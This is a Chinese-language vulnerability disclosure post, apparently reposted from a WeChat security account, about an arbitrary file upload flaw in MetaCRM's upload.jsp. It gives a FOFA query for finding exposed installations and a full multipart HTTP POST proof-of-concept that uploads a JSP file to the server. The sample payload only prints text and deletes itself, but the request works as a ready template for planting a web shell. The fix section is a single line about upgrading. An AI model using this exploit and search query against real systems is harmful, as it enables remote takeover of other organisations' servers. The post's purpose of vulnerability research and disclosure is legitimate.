免责声明
本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,若利用本文提供的内容或工具造成任何直接或间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关。如有内容争议或侵权,请及时私信我们!我们会立即删除并致歉。谢谢!
一、漏洞简述
MetaCRM是一款智能平台化CRM软件,通过提升企业管理和协同办公,全面提高企业管理水平和运营效率,帮助企业实现卓越管理。是建立在一种统一的架构上的技术领先的CRM系统。其upload.jsp接口存在任意文件上传漏洞,攻击者可通过改漏洞上传恶意脚本从而控制该系统。
二、网络测绘
fofa:body="/common/scripts/basic.js"三、漏洞复现
四、漏洞检测poc
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null& HTTP/1.1Host: 0.0.0.0Content-Length: 768Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0Mh3BfgWszxRFokhUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Referer: http://0.0.0.0/develop/systparam/softlogo/file2.jspConnection: close------WebKitFormBoundary0Mh3BfgWszxRFokhContent-Disposition: form-data; name="file"; filename="klms.jsp"Content-Type: text/plain<% out.print("Hello");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>------WebKitFormBoundary0Mh3BfgWszxRFokhContent-Disposition: form-data; name="key"null------WebKitFormBoundary0Mh3BfgWszxRFokhContent-Disposition: form-data; name="form"null------WebKitFormBoundary0Mh3BfgWszxRFokhContent-Disposition: form-data; name="field"null------WebKitFormBoundary0Mh3BfgWszxRFokhContent-Disposition: form-data; name="filetitile"null------WebKitFormBoundary0Mh3BfgWszxRFokhContent-Disposition: form-data; name="filefolder"null------WebKitFormBoundary0Mh3BfgWszxRFokh--
五、漏洞修复
官方已更新补丁,请升级至最新版本。
免责声明
本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,若利用本文提供的内容或工具造成任何直接或间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关。如有内容争议或侵权,请及时私信我们!我们会立即删除并致歉。谢谢!
原文始发于微信公众号(实战安全研究):漏洞复现 | MetaCRM客户关系管理系统-任意文件上传漏洞【附poc】
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论